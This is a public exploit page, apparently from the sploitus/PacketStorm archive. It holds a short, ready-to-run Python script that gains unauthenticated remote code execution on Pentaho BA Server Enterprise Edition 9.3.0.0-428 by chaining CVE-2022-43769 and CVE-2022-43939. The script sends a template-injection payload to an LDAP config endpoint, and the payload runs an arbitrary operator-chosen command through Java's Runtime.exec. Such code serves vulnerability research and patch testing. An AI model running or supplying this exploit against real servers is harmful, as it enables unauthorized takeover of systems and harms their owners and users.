Share
## https://sploitus.com/exploit?id=PACKETSTORM:171712
# Title: Pentaho BA Server EE 9.3.0.0-428 - RCE via Server-Side Template Injection (Unauthenticated)  
# Author: dwbzn  
# Date: 2022-04-04  
# Vendor: https://www.hitachivantara.com/  
# Software Link: https://www.hitachivantara.com/en-us/products/lumada-dataops/data-integration-analytics/download-pentaho.html  
# Version: Pentaho BA Server 9.3.0.0-428  
# CVE: CVE-2022-43769, CVE-2022-43939  
# Tested on: Windows 11  
# Credits: https://research.aurainfosec.io/pentest/pentah0wnage  
# NOTE: This only works on the enterprise edition. Haven't tested it on Linux, but it should work (don't use notepad.exe).  
  
# Unauthenticated RCE via SSTI using CVE-2022-43769 and CVE-2022-43939 (https://research.aurainfosec.io/pentest/pentah0wnage)  
import requests  
import argparse  
  
parser = argparse.ArgumentParser(description='CVE-2022-43769 + CVE-2022-43939 - Unauthenticated RCE via SSTI')  
parser.add_argument('baseurl', type=str, help='base url e.g. http://127.0.0.1:8080/pentaho')  
parser.add_argument('--cmd', type=str, default='notepad.exe', nargs='?', help='command to execute (default notepad.exe)', required=False)  
args = parser.parse_args()  
  
url = f"{args.baseurl}/api/ldap/config/ldapTreeNodeChildren/require.js?url=%23{{T(java.lang.Runtime).getRuntime().exec('{args.cmd}')}}&mgrDn=a&pwd=a"  
  
print ("running...")  
r = requests.get(url)  
if r.text == 'false':  
print ("command should've executed! nice.")  
else:  
print ("didn't work. sadge...")